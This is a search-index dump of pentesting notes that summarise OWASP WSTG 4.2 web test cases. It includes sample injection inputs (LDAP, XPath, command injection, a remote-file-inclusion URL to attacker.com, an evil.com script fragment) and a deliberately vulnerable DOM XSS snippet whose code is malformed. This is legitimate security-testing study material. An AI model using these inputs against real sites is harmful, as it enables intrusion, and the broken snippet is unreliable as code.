Question Answer - Determine the complexity and how straight-forward the questions are (Weak pre-generated questions, Weak self-generated question) - Assess possible user answers and brute force capabilities. 4.9 WSTG-ATHN-09 Testing for Weak Password Change or Reset Functionalities - Determine whether the password change and reset functionality allows accounts to be compromised. - Test password reset (Display old password in plain-text?, Send via email?, Random token on confirmation email ?) - Test password change (Need old password?) 4.10 WSTG-ATHN-10 Testing for Weaker Authentication in Alternative Channel - Identify alternative authentication channels. - Assess the security measures used and if any bypasses exists on the alternative channels. 4.11 WSTG-ATHN-11 Testing Multi-Factor Authentication (MFA) - Identify the type of MFA used by the application. - Determine whether the MFA implementation is robust and secure. - Attempt to bypass the MFA.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#5-authorization-testing","title":"5. Authorization Testing","text":"5. Authorization Testing ID Link to Hackinglife Link to OWASP Description 5.1 WSTG-ATHZ-01 Testing Directory Traversal File Include - Identify injection points that pertain to path traversal. - Assess bypassing techniques and identify the extent of path traversal (dot-dot-slash attack, Local/Remote file inclusion) 5.2 WSTG-ATHZ-02 Testing for Bypassing Authorization Schema - Assess if horizontal or vertical access is possible. - Access to Administrative functions by force browsing (/admin/addUser) 5.3 WSTG-ATHZ-03 Testing for Privilege Escalation - Identify injection points related to role/privilege manipulation. For example: Change some param groupid=2 to groupid=1 - Verify that it is not possible for a user to modify their privileges or roles inside the application - Fuzz or otherwise attempt to bypass security measures. 5.4 WSTG-ATHZ-04 Testing for Insecure Direct Object References - Identify points where object references may occur. - Assess the access control measures and if they're vulnerable to IDOR. For example: Force changing parameter value (?invoice=123 -> ?invoice=456) 5.5 WSTG-ATHZ-05 Testing for OAuth Weaknesses - Determine if OAuth2 implementation is vulnerable or using a deprecated or custom implementation.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#6-session-management-testing","title":"6. Session Management Testing","text":"6. Session Management Testing ID Link to Hackinglife Link to OWASP Description 6.1 WSTG-SESS-01 Testing for Session Management Schema - Gather session tokens, for the same user and for different users where possible. - Analyze and ensure that enough randomness exists to stop session forging attacks. - Modify cookies that are not signed and contain information that can be manipulated. 6.2 WSTG-SESS-02 Testing for Cookies Attributes - Ensure that the proper security configuration is set for cookies (HTTPOnly and Secure flag, Samesite=Strict) 6.3 WSTG-SESS-03 Testing for Session Fixation - Analyze the authentication mechanism and its flow. - Force cookies and assess the impact. - Check whether the application renew the cookie after a successfully user authentication. 6.4 WSTG-SESS-04 Testing for Exposed Session Variables - Ensure that proper encryption is implemented (Encryption & Reuse of session Tokens vulnerabilities). - Review the caching configuration. - Assess the channel and methods' security (Send sessionID with GET method ?) 6.5 WSTG-SESS-05 Testing for Cross Site Request Forgery - Determine whether it is possible to initiate requests on a user's behalf that are not initiated by the user. - Conduct URL analysis, Direct access to functions without any token. 6.6 WSTG-SESS-06 Testing for Logout Functionality - Assess the logout UI. - Analyze the session timeout and if the session is properly killed after logout. 6.7 WSTG-SESS-07 Testing Session Timeout - Validate that a hard session timeout exists, after the timeout has passed, all session tokens should be destroyed or be unusable. 6.8 WSTG-SESS-08 Testing for Session Puzzling - Identify all session variables. - Break the logical flow of session generation. - Check whether the application uses the same session variable for more than one purpose 6.9 WSTG-SESS-09 Testing for Session Hijacking - Identify vulnerable session cookies. - Hijack vulnerable cookies and assess the risk level. 6.10 WSTG-SESS-10 Testing JSON Web Tokens - Determine whether the JWTs expose sensitive information. - Determine whether the JWTs can be tampered with or modified.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#7-data-validation-testing","title":"7. Data Validation Testing","text":"7. Data Validation Testing ID Link to Hackinglife Link to OWASP Description 7.1 WSTG-INPV-01 Testing for Reflected Cross Site Scripting - Identify variables that are reflected in responses. - Assess the input they accept and the encoding that gets applied on return (if any). 7.2 WSTG-INPV-02 Testing for Stored Cross Site Scripting - Identify stored input that is reflected on the client-side. - Assess the input they accept and the encoding that gets applied on return (if any). 7.3 WSTG-INPV-03 Testing for HTTP Verb Tampering N/A, This content has been merged into: WSTG-CONF-06 7.4 WSTG-INPV-04 Testing for HTTP Parameter Pollution - Identify the backend and the parsing method used. - Assess injection points and try bypassing input filters using HPP. 7.5 WSTG-INPV-05 Testing for SQL Injection - Identify SQL injection points. - Assess the severity of the injection and the level of access that can be achieved through it. 7.6 WSTG-INPV-06 Testing for LDAP Injection - Identify LDAP injection points: /ldapsearch?user= user=user=)(uid=))(|(uid=* pass=password - Assess the severity of the injection: 7.7 WSTG-INPV-07 Testing for XML Injection - Identify XML injection points with XML Meta Characters: ', \" , <>, , &, <![CDATA[ / ]]>, XXE, TAG - Assess the types of exploits that can be attained and their severities. 7.8 WSTG-INPV-08 Testing for SSI Injection - Identify SSI injection points (Presense of .shtml extension) with these characters: < ! # = / . \" - > and [a-zA-Z0-9] - Assess the severity of the injection. 7.9 WSTG-INPV-09 Testing for XPath Injection - Identify XPATH injection points by checking for XML error enumeration by supplying a single quote ('): Username: \u2018 or \u20181\u2019 = \u20181 Password: \u2018 or \u20181\u2019 = \u20181 7.10 WSTG-INPV-10 Testing for IMAP SMTP Injection - Identify IMAP/SMTP injection points (Header, Body, Footer) with special characters (i.e.: \\, \u2018, \u201c, @, #, !, |) - Understand the data flow and deployment structure of the system. - Assess the injection impacts. 7.11 WSTG-INPV-11 Testing for Code Injection - Identify injection points where you can inject code into the application. - Check LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource). - Check RFI from malicious URL ?page.php?file=http://attacker.com/malicious_page - Assess the injection severity. 7.12 WSTG-INPV-12 Testing for Command Injection - Identify and assess the command injection points with special characters (i.e.: | ; & $ > < ' !) For example: ?doc=Doc1.pdf+|+Dir c:| 7.13 WSTG-INPV-13 Testing for Format String Injection - Assess whether injecting format string conversion specifiers into user-controlled fields causes undesired behavior from the application. 7.14 WSTG-INPV-14 Testing for Incubated Vulnerability - Identify injections that are stored and require a recall step to the stored injection. (i.e.: CSV Injection, Blind Stored XSS, File Upload) - Understand how a recall step could occur. - Set listeners or activate the recall step if possible. 7.15 WSTG-INPV-15 Testing for HTTP Splitting Smuggling - Assess if the application is vulnerable to splitting, identifying what possible attacks are achievable. - Assess if the chain of communication is vulnerable to smuggling, identifying what possible attacks are achievable. 7.16 WSTG-INPV-16 Testing for HTTP Incoming Requests - Monitor all incoming and outgoing HTTP requests to the Web Server to inspect any suspicious requests. - Monitor HTTP traffic without changes of end user Browser proxy or client-side application. 7.17 WSTG-INPV-17 Testing for Host Header Injection - Assess if the Host header is being parsed dynamically in the application. - Bypass security controls that rely on the header. 7.18 WSTG-INPV-18 Testing for Server-side Template Injection - Detect template injection vulnerability points. - Identify the templating engine. - Build the exploit. 7.19 WSTG-INPV-19 Testing for Server-Side Request Forgery - Identify SSRF injection points. - Test if the injection points are exploitable. - Asses the severity of the vulnerability. 7.20 WSTG-INPV-20 Testing for Mass Assignment - Identify requests that modify objects - Assess if it is possible to modify fields never intended to be modified from outside","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#8-error-handling","title":"8. Error Handling","text":"8. Error Handling ID Link to Hackinglife Link to OWASP Description 8.1 WSTG-ERRH-01 Testing for Improper Error Handling - Identify existing error output (i.e.: Random files/folders (40x) - Analyze the different output returned. 8.2 WSTG-ERRH-02 Testing for Stack Traces N/A, This content has been merged into: WSTG-ERRH-01","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#9-cryptography","title":"9. Cryptography","text":"9. Cryptography ID Link to Hackinglife Link to OWASP Description 9.1 WSTG-CRYP-01 Testing for Weak Transport Layer Security - Validate the server configuration (Identify weak ciphers/protocols (ie. RC4, BEAST, CRIME, POODLE) - Review the digital certificate's cryptographic strength and validity. - Ensure that the TLS security is not bypassable and is properly implemented across the application. 9.2 WSTG-CRYP-02 Testing for Padding Oracle - Identify encrypted messages that rely on padding. - Attempt to break the padding of the encrypted messages and analyze the returned error messages for further analysis. 9.3 WSTG-CRYP-03 Testing for Sensitive Information Sent via Unencrypted Channels - Identify sensitive information transmitted through the various channels. - Assess the privacy and security of the channels used. - Check sensitive data during the transmission: \u2022 Information used in authentication (e.g. Credentials, PINs, Session, identifiers, Tokens, Cookies\u2026), \u2022 Information protected by laws, regulations or specific organizational, policy (e.g. Credit Cards, Customers data) 9.4 WSTG-CRYP-04 Testing for Weak Encryption - Provide a guideline for the identification weak encryption or hashing uses and implementations.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#10-business-logic-testing","title":"10. Business logic Testing","text":"10. Business logic Testing ID Link to Hackinglife Link to OWASP Description 10.1 WSTG-BUSL-01 Test Business Logic Data Validation - Identify data injection points. - Validate that all checks are occurring on the back end and can't be bypassed. - Attempt to break the format of the expected data and analyze how the application is handling it. 10.2 WSTG-BUSL-02 Test Ability to Forge Requests - Review the project documentation looking for guessable, predictable, or hidden functionality of fields. - Insert logically valid data in order to bypass normal business logic workflow. 10.3 WSTG-BUSL-03 Test Integrity Checks - Review the project documentation for components of the system that move, store, or handle data. - Determine what type of data is logically acceptable by the component and what types the system should guard against. - Determine who should be allowed to modify or read that data in each component. - Attempt to insert, update, or delete data values used by each component that should not be allowed per the business logic workflow. 10.4 WSTG-BUSL-04 Test for Process Timing - Review the project documentation for system functionality that may be impacted by time. Such as execution time or actions that help users predict a future outcome or allow one to circumvent any part of the business logic or workflow. For example, not completing transactions in an expected time. - Develop and execute the mis-use cases ensuring that attackers can not gain an advantage based on any timing (Race Condition). 10.5 WSTG-BUSL-05 Test Number of Times a Function Can Be Used Limits - Identify functions that must set limits to the times they can be called. - Assess if there is a logical limit set on the functions and if it is properly validated. - For each of the functions and features found that should only be executed a single time or specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute more than the allowable number of times. 10.6 WSTG-BUSL-06 Testing for the Circumvention of Work Flows - Review the project documentation for methods to skip or go through steps in the application process in a different order from the intended business logic flow. - Develop a misuse case and try to circumvent every logic flow identified. 10.7 WSTG-BUSL-07 Test Defenses Against Application Misuse - Generate notes from all tests conducted against the system. - Review which tests had a different functionality based on aggressive input. - Understand the defenses in place and verify if they are enough to protect the system against bypassing techniques. - Measures that might indicate the application has in-built self-defense: \u2022 Changed responses \u2022 Blocked requests \u2022 Actions that log a user out or lock their account 10.8 WSTG-BUSL-08 Test Upload of Unexpected File Types - Review the project documentation for file types that are rejected by the system. - Verify that the unwelcomed file types are rejected and handled safely. Also, check whether the website only check for \"Content-type\" or file extension. - Verify that file batch uploads are secure and do not allow any bypass against the set security measures. 10.9 WSTG-BUSL-09 Test Upload of Malicious Files - Identify the file upload functionality. - Review the project documentation to identify what file types are considered acceptable, and what types would be considered dangerous or malicious. - If documentation is not available then consider what would be appropriate based on the purpose of the application. - Determine how the uploaded files are processed. - Obtain or create a set of malicious files for testing. - Try to upload the malicious files to the application and determine whether it is accepted and processed. 10.10 WSTG-BUSL-10 Test Payment Functionality - Determine whether the business logic for the e-commerce functionality is robust. - Understand how the payment functionality works. - Determine whether the payment functionality is secure.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#11-client-side-testing","title":"11. Client Side Testing","text":"11. Client Side Testing ID Link to Hackinglife Link to OWASP Description 11.1 WSTG-CLNT-01 Testing for DOM-Based Cross Site Scripting - Identify DOM sinks. - Build payloads that pertain to every sink type. 11.2 WSTG-CLNT-02 Testing for JavaScript Execution - Identify sinks and possible JavaScript injection points. 11.3 WSTG-CLNT-03 Testing for HTML Injection - Identify HTML injection points and assess the severity of the injected content. For example: page.html?user= 11.4 WSTG-CLNT-04 Testing for Client-side URL Redirect - Identify injection points that handle URLs or paths. - Assess the locations that the system could redirect to (Open Redirect). For example: ?redirect=www.fake-target.site 11.5 WSTG-CLNT-05 Testing for CSS Injection - Identify CSS injection points. - Assess the impact of the injection. 11.6 WSTG-CLNT-06 Testing for Client-side Resource Manipulation - Identify sinks with weak input validation. - Assess the impact of the resource manipulation. For example: www.victim.com/#http://evil.com/js.js 11.7 WSTG-CLNT-07 Testing Cross Origin Resource Sharing - Identify endpoints that implement CORS. - Ensure that the CORS configuration is secure or harmless. 11.8 WSTG-CLNT-08 Testing for Cross Site Flashing - Decompile and analyze the application's code. - Assess sinks inputs and unsafe method usages. For example: file.swf?lang=http://evil 11.9 WSTG-CLNT-09 Testing for Clickjacking - Understand security measures in place. - Discover if a website is vulnerable by loading into an iframe, create simple web page that includes a frame containing the target. - Assess how strict the security measures are and if they are bypassable. 11.10 WSTG-CLNT-10 Testing WebSockets - Identify the usage of WebSockets by inspecting ws:// or wss:// URI scheme. - Assess its implementation by using the same tests on normal HTTP channels. 11.11 WSTG-CLNT-11 Testing Web Messaging - Assess the security of the message's origin. - Validate that it's using safe methods and validating its input. 11.12 WSTG-CLNT-12 Testing Browser Storage - Determine whether the website is storing sensitive data in client-side storage. - The code handling of the storage objects should be examined for possibilities of injection attacks, such as utilizing unvalidated input or vulnerable libraries. 11.13 WSTG-CLNT-13 Testing for Cross Site Script Inclusion - Locate sensitive data across the system. - Assess the leakage of sensitive data through various techniques. 11.14 WSTG-CLNT-14 Testing for Reverse Tabnabbing N/A","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#12-api-testing","title":"12. API Testing","text":"12. API Testing ID Link to Hackinglife Link to OWASP Description 12.1 WSTG-APIT-01 Testing GraphQL - Assess that a secure and production-ready configuration is deployed. - Validate all input fields against generic attacks. - Ensure that proper access controls are applied.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/WSTG-APIT-01/","title":"Testing GraphQL","text":"

                            OWASP Web Security Testing Guide 4.2 > 12. API Testing > 12.1. Testing GraphQL

                            ID Link to Hackinglife Link to OWASP Description 12.1 WSTG-APIT-01 Testing GraphQL - Assess that a secure and production-ready configuration is deployed. - Validate all input fields against generic attacks. - Ensure that proper access controls are applied.","tags":["web pentesting","WSTG-APIT-01"]},{"location":"OWASP/WSTG-ATHN-01/","title":"Testing for Credentials Transported over an Encrypted Channel","text":"

                            OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.1. Testing for Credentials Transported over an Encrypted Channel

                            ID Link to Hackinglife Link to OWASP Description 4.1 WSTG-ATHN-01 Testing for Credentials Transported over an Encrypted Channel N/A, This content has been merged into: WSTG-CRYP-03","tags":["web pentesting","WSTG-ATHN-01"]},{"location":"OWASP/WSTG-ATHN-02/","title":"Testing for Default Credentials","text":"

                            OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.2. Testing for Default Credentials

                            ID Link to Hackinglife Link to OWASP Description 4.2 WSTG-ATHN-02 Testing for Default Credentials - Determine whether the application has any User accounts with default passwords.","tags":["web pentesting","WSTG-ATHN-02"]},{"location":"OWASP/WSTG-ATHN-03/","title":"Testing for Weak Lock Out Mechanism","text":"

                            OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.3. Testing for Weak Lock Out Mechanism

                            ID Link to Hackinglife Link to OWASP Description 4.3 WSTG-ATHN-03 Testing for Weak Lock Out Mechanism - Evaluate the account lockout mechanism's ability to mitigate brute force password guessing. - Evaluate the unlock mechanism's resistance to unauthorized account unlocking.","tags":["web pentesting","WSTG-ATHN-03"]},{"location":"OWASP/WSTG-ATHN-04/","title":"Testing for Bypassing Authentication Schema","text":"

                            OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.4. Testing for Bypassing Authentication Schema

                            ID Link to Hackinglife Link to OWASP Description 4.4 WSTG-ATHN-04 Testing for Bypassing Authentication Schema - Ensure that authentication is applied across all services that require it. - Force browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, Session ID prediction, SQL Injection","tags":["web pentesting","WSTG-ATHN-04"]},{"location":"OWASP/WSTG-ATHN-05/","title":"Testing for Vulnerable Remember Password","text":"

                            OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.5. Testing for Vulnerable Remember Password

                            ID Link to Hackinglife Link to OWASP Description 4.5 WSTG-ATHN-05 Testing for Vulnerable Remember Password - Validate that the generated session is managed securely and do not put the user's credentials in danger (e.g., cookie) - Verify that the credentials are not stored in clear text, but are hashed. Autocompleted=off?","tags":["web pentesting","WSTG-ATHN-05"]},{"location":"OWASP/WSTG-ATHN-06/","title":"Testing for Browser Cache Weaknesses","text":"

                            OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.6. Testing for Browser Cache Weaknesses

                            ID Link to Hackinglife Link to OWASP Description 4.6 WSTG-ATHN-06 Testing for Browser Cache Weaknesses - Review if the application stores sensitive information on the client-side. - Review if access can occur without authorization. - Check browser history issue by clicking \"Back\" button after logging out. - Check browser cache issue from HTTP response headers (Cache-Control: nocache)","tags":["web pentesting","WSTG-ATHN-06"]},{"location":"OWASP/WSTG-ATHN-07/","title":"Testing for Weak Password Policy","text":"

                            OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.7. Testing for Weak Password Policy

                            ID Link to Hackinglife Link to OWASP Description 4.7 WSTG-ATHN-07 Testing for Weak Password Policy - Determine the resistance of the application against brute Force password guessing using available password dictionaries by evaluating the length, complexity, reuse, and aging requirements of passwords. - Review whether new User accounts are created with weak or predictable passwords.","tags":["web pentesting","WSTG-ATHN-07"]},{"location":"OWASP/WSTG-ATHN-08/","title":"Testing for Weak Security Question Answer","text":"

                            OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.8. Testing for Weak Security Question Answer

                            ID Link to Hackinglife Link to OWASP Description 4.8 WSTG-ATHN-08 Testing for Weak Security Question Answer - Determine the complexity and how straight-forward the questions are (Weak pre-generated questions, Weak self-generated question) - Assess possible user answers and brute force capabilities.","tags":["web pentesting","WSTG-ATHN-08"]},{"location":"OWASP/WSTG-ATHN-09/","title":"Testing for Weak Password Change or Reset Functionalities","text":"

                            OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.9. Testing for Weak Password Change or Reset Functionalities

                            ID Link to Hackinglife Link to OWASP Description 4.9 WSTG-ATHN-09 Testing for Weak Password Change or Reset Functionalities - Determine whether the password change and reset functionality allows accounts to be compromised. - Test password reset (Display old password in plain-text?, Send via email?, Random token on confirmation email ?) - Test password change (Need old password?)","tags":["web pentesting","WSTG-ATHN-09"]},{"location":"OWASP/WSTG-ATHN-10/","title":"Testing for Weaker Authentication in Alternative Channel","text":"

                            OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.10. Testing for Weaker Authentication in Alternative Channel

                            ID Link to Hackinglife Link to OWASP Description 4.10 WSTG-ATHN-10 Testing for Weaker Authentication in Alternative Channel - Identify alternative authentication channels. - Assess the security measures used and if any bypasses exists on the alternative channels.","tags":["web pentesting","WSTG-ATHN-10"]},{"location":"OWASP/WSTG-ATHN-11/","title":"Testing Multi-Factor Authentication (MFA)","text":"

                            OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.11. Testing Multi-Factor Authentication (MFA)

                            ID Link to Hackinglife Link to OWASP Description 4.11 WSTG-ATHN-11 Testing Multi-Factor Authentication (MFA) - Identify the type of MFA used by the application. - Determine whether the MFA implementation is robust and secure. - Attempt to bypass the MFA.","tags":["web pentesting","WSTG-ATHN-11"]},{"location":"OWASP/WSTG-ATHZ-01/","title":"Testing Directory Traversal File Include","text":"OWASP

                            OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.1. Testing Directory Traversal File Include

                            ID Link to Hackinglife Link to OWASP Description 5.1 WSTG-ATHZ-01 Testing Directory Traversal File Include - Identify injection points that pertain to path traversal. - Assess bypassing techniques and identify the extent of path traversal (dot-dot-slash attack, Local/Remote file inclusion)","tags":["web pentesting","WSTG-ATHZ-01"]},{"location":"OWASP/WSTG-ATHZ-01/#see-my-notes","title":"See my notes","text":"

                            See my notes on Local File Inclusion

                            See my notes on Remote File Inclusion

                            ","tags":["web pentesting","WSTG-ATHZ-01"]},{"location":"OWASP/WSTG-ATHZ-02/","title":"Testing for Bypassing Authorization Schema","text":"OWASP

                            OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.2. Testing for Bypassing Authorization Schema

                            ID Link to Hackinglife Link to OWASP Description 5.2 WSTG-ATHZ-02 Testing for Bypassing Authorization Schema - Assess if horizontal or vertical access is possible. - Access to Administrative functions by force browsing (/admin/addUser)","tags":["web pentesting","WSTG-ATHZ-02"]},{"location":"OWASP/WSTG-ATHZ-02/#see-my-notes","title":"See my notes","text":"
                            • Broken access control: What is it. How this attack works. Attack classification. Types of databases. Payloads. Dictionaries.
                            ","tags":["web pentesting","WSTG-ATHZ-02"]},{"location":"OWASP/WSTG-ATHZ-03/","title":"Testing for Privilege Escalation","text":"

                            OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.3. Testing for Privilege Escalation

                            ID Link to Hackinglife Link to OWASP Description 5.3 WSTG-ATHZ-03 Testing for Privilege Escalation - Identify injection points related to role/privilege manipulation. For example: Change some param groupid=2 to groupid=1 - Verify that it is not possible for a user to modify their privileges or roles inside the application - Fuzz or otherwise attempt to bypass security measures.","tags":["web pentesting","WSTG-ATHZ-03"]},{"location":"OWASP/WSTG-ATHZ-04/","title":"Testing for Insecure Direct Object References","text":"

                            OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.4. Testing for Insecure Direct Object References

                            ID Link to Hackinglife Link to OWASP Description 5.4 WSTG-ATHZ-04 Testing for Insecure Direct Object References - Identify points where object references may occur. - Assess the access control measures and if they're vulnerable to IDOR. For example: Force changing parameter value (?invoice=123 -> ?invoice=456)","tags":["web pentesting","WSTG-ATHZ-04"]},{"location":"OWASP/WSTG-ATHZ-05/","title":"Testing for OAuth Weaknesses","text":"

                            OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.5. Testing for OAuth Weaknesses

                            ID Link to Hackinglife Link to OWASP Description 5.5 WSTG-ATHZ-05 Testing for OAuth Weaknesses - Determine if OAuth2 implementation is vulnerable or using a deprecated or custom implementation.","tags":["web pentesting","WSTG-ATHZ-05"]},{"location":"OWASP/WSTG-BUSL-01/","title":"Test Business Logic Data Validation","text":"

                            OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.1. Test Business Logic Data Validation

                            ID Link to Hackinglife Link to OWASP Description 10.1 WSTG-BUSL-01 Test Business Logic Data Validation - Identify data injection points. - Validate that all checks are occurring on the back end and can't be bypassed. - Attempt to break the format of the expected data and analyze how the application is handling it.","tags":["web pentesting","WSTG-BUSL-01"]},{"location":"OWASP/WSTG-BUSL-02/","title":"Test Ability to Forge Requests","text":"

                            OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.2. Test Ability to Forge Requests

                            ID Link to Hackinglife Link to OWASP Description 10.2 WSTG-BUSL-02 Test Ability to Forge Requests - Review the project documentation looking for guessable, predictable, or hidden functionality of fields. - Insert logically valid data in order to bypass normal business logic workflow.","tags":["web pentesting","WSTG-BUSL-02"]},{"location":"OWASP/WSTG-BUSL-03/","title":"Test Integrity Checks","text":"

                            OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.3. Test Integrity Checks

                            ID Link to Hackinglife Link to OWASP Description 10.3 WSTG-BUSL-03 Test Integrity Checks - Review the project documentation for components of the system that move, store, or handle data. - Determine what type of data is logically acceptable by the component and what types the system should guard against. - Determine who should be allowed to modify or read that data in each component. - Attempt to insert, update, or delete data values used by each component that should not be allowed per the business logic workflow.","tags":["web pentesting","WSTG-BUSL-03"]},{"location":"OWASP/WSTG-BUSL-04/","title":"Test for Process Timing","text":"

                            OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.4. Test for Process Timing

                            ID Link to Hackinglife Link to OWASP Description 10.4 WSTG-BUSL-04 Test for Process Timing - Review the project documentation for system functionality that may be impacted by time. Such as execution time or actions that help users predict a future outcome or allow one to circumvent any part of the business logic or workflow. For example, not completing transactions in an expected time. - Develop and execute the mis-use cases ensuring that attackers can not gain an advantage based on any timing (Race Condition).","tags":["web pentesting","WSTG-BUSL-04"]},{"location":"OWASP/WSTG-BUSL-05/","title":"Test Number of Times a Function Can Be Used Limits","text":"

                            OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.5. Test Number of Times a Function Can Be Used Limits

                            ID Link to Hackinglife Link to OWASP Description 10.5 WSTG-BUSL-05 Test Number of Times a Function Can Be Used Limits - Identify functions that must set limits to the times they can be called. - Assess if there is a logical limit set on the functions and if it is properly validated. - For each of the functions and features found that should only be executed a single time or specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute more than the allowable number of times.","tags":["web pentesting","WSTG-BUSL-05"]},{"location":"OWASP/WSTG-BUSL-06/","title":"Testing for the Circumvention of Work Flows","text":"

                            OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.6. Testing for the Circumvention of Work Flows

                            ID Link to Hackinglife Link to OWASP Description 10.6 WSTG-BUSL-06 Testing for the Circumvention of Work Flows - Review the project documentation for methods to skip or go through steps in the application process in a different order from the intended business logic flow. - Develop a misuse case and try to circumvent every logic flow identified.","tags":["web pentesting","WSTG-BUSL-06"]},{"location":"OWASP/WSTG-BUSL-07/","title":"Test Defenses Against Application Misuse","text":"

                            OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.7. Test Defenses Against Application Misuse

                            ID Link to Hackinglife Link to OWASP Description 10.7 WSTG-BUSL-07 Test Defenses Against Application Misuse - Generate notes from all tests conducted against the system. - Review which tests had a different functionality based on aggressive input. - Understand the defenses in place and verify if they are enough to protect the system against bypassing techniques. - Measures that might indicate the application has in-built self-defense: \u2022 Changed responses \u2022 Blocked requests \u2022 Actions that log a user out or lock their account","tags":["web pentesting","WSTG-BUSL-07"]},{"location":"OWASP/WSTG-BUSL-08/","title":"Test Upload of Unexpected File Types","text":"OWASP

                            OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.8. Test Upload of Unexpected File Types

                            ID Link to Hackinglife Link to OWASP Description 10.8 WSTG-BUSL-08 Test Upload of Unexpected File Types - Review the project documentation for file types that are rejected by the system. - Verify that the unwelcomed file types are rejected and handled safely. Also, check whether the website only check for \"Content-type\" or file extension. - Verify that file batch uploads are secure and do not allow any bypass against the set security measures.","tags":["web pentesting","WSTG-BUSL-08"]},{"location":"OWASP/WSTG-BUSL-08/#see-my-notes-on-arbitrary-file-upload","title":"See my notes on Arbitrary File Upload","text":"

                            See my notes on Arbitrary File Upload

                            ","tags":["web pentesting","WSTG-BUSL-08"]},{"location":"OWASP/WSTG-BUSL-09/","title":"Test Upload of Malicious Files","text":"OWASP

                            OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.9. Test Upload of Malicious Files

                            ID Link to Hackinglife Link to OWASP Description 10.9 WSTG-BUSL-09 Test Upload of Malicious Files - Identify the file upload functionality. - Review the project documentation to identify what file types are considered acceptable, and what types would be considered dangerous or malicious. - If documentation is not available then consider what would be appropriate based on the purpose of the application. - Determine how the uploaded files are processed. - Obtain or create a set of malicious files for testing. - Try to upload the malicious files to the application and determine whether it is accepted and processed.","tags":["web pentesting","WSTG-BUSL-09"]},{"location":"OWASP/WSTG-BUSL-09/#see-my-notes-on-arbitrary-file-upload","title":"See my notes on Arbitrary File Upload","text":"

                            See my notes on Arbitrary File Upload

                            ","tags":["web pentesting","WSTG-BUSL-09"]},{"location":"OWASP/WSTG-BUSL-10/","title":"Test Payment Functionality","text":"

                            OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.10. Test Payment Functionality

                            ID Link to Hackinglife Link to OWASP Description 10.10 WSTG-BUSL-10 Test Payment Functionality - Determine whether the business logic for the e-commerce functionality is robust. - Understand how the payment functionality works. - Determine whether the payment functionality is secure.","tags":["web pentesting","WSTG-BUSL-10"]},{"location":"OWASP/WSTG-CLNT-01/","title":"Testing for DOM-Based Cross Site Scripting","text":"OWASP

                            OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.1. Testing for DOM-Based Cross Site Scripting

                            ID Link to Hackinglife Link to OWASP Description 11.1 WSTG-CLNT-01 Testing for DOM-Based Cross Site Scripting - Identify DOM sinks. - Build payloads that pertain to every sink type.

                            The key in exploiting this XSS flaw is that the client-side script code can access the browser's DOM, thus all the information available in it. Examples of this information are the URL, history, cookies, local storage,... Technically there are two keywords: sources and sinks. Let's use the following vulnerable code:

                            ","tags":["web pentesting","WSTG-CLNT-01"]},{"location":"OWASP/WSTG-CLNT-01/#causes","title":"Causes","text":"

                            This vulnerable code in a welcome page may lead to a DOM XSS attack: http://example.com/#w!Giuseppe

                            <h1 id='welcome'></h1>\n<script>\n    var w = \"Welcome\";\n    var name = document.location.hash.search(/#W!1)+3,\n                document.location.hash.length\n                );\n    document.getElementById('Welcome').innerHTML = w + name;\n</script>\n

                            location.hash is the source of the untrusted input. .innerHTML is the sink where the input is used.

                            To deliver a DOM-based XSS attack, you need to place data into a source so that it is propagated to a sink and causes execution of arbitrary JavaScript. The most common source for DOM XSS is the URL, which is typically accessed with the\u00a0window.location\u00a0object.

                            What is a sink? A sink is a potentially dangerous JavaScript function or DOM object that can cause undesirable effects if attacker-controlled data is passed to it. For example, the\u00a0eval()\u00a0function is a sink because it processes the argument that is passed to it as JavaScript. An example of an HTML sink is\u00a0document.body.innerHTML\u00a0because it potentially allows an attacker to inject malicious HTML and execute arbitrary JavaScript.

                            Summing up: you should avoid allowing data from any untrusted source to be dynamically written to the HTML document.

                            Which sinks can lead to DOM-XSS vulnerabilities:

                            • document.write()
                            • document.writeln()
                            • document.replace()
                            • document.domain
                            • element.innerHTML
                            • element.outerHTML
                            • element.insertAdjacentHTML
                            • element.onevent

                            This project, DOMXSS wiki aims to identify sources and sinks methods exposed by public, widely used javascript frameworks.

                            ","tags":["web pentesting","WSTG-CLNT-01"]},{"location":"OWASP/WSTG-CLNT-01/#attack-techniques","title":"Attack techniques","text":"

                            Go to my XSS cheat sheet

